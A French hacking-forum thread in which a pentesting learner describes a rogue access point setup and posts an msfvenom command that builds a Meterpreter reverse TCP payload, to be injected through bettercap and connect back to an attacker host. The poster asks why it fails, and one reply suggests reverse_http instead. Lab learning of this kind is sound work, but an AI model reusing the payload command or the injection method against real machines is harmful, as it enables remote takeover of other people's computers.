Auteur Sujet: Lancer une session reverse TCP par injection via bettercap  (Lu 1290 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne Kurdy34

  • Membre Junior
  • *
  • Messages: 31
  • +0/-0
Salut a tous,

Actuellement en train de tenter une reconversion dans l'univers du pentesting je suis toujours occupé par les réseaux locaux.
Mon objectif est de créer une session reverse TCP entre mon pc cible et mon PC attaquant.
Voici le schéma

WLAN ======== (wlan0) KALI (attaquant) (at0) ========== CIBLE

J'ai donc créé une rogue AP auquel j'ai connecté mon pc cible.
Ma prochaine étape est d'inecter un script (en js via bettercap) pour démarrer la session.

Mon probleme c'est que sans parler de l'injection, je n'arrive pas à générer un payload fonctionnel, Voici ma tentative

msfvenom -p windows/meterpreter/reverse_tcp  -e x86/shikata_ga_nai -f js_le -o Desktop/levirus3.js lhost=10.0.2.1 lport=4444 -b '\x00\x0a\x0d\x40'
Quand je l'exécute sur le pc cible (win 10 x64) j'ai une erreur Windows Script Host code 800A03EA dès le premier caractère du script. Le lancer dans un navigateur affiche le script mais ne l'execute pas.

Est ce que je fais fausse route? Est il seulement possible de générer ce payload en javascript executable par un navigateur web?

Hors ligne pyko78

  • Membre Junior
  • *
  • Messages: 10
  • +0/-0
Re : Lancer une session reverse TCP par injection via bettercap
« Réponse #1 le: 13 août 2017 à 10:51:35 »
Je ne sais pas si tu fais fausse route mais pour l'executer depuis un navigateur internet ta le reverse_http et https. Je ne sais pas si ça t'aide bonne chance  :)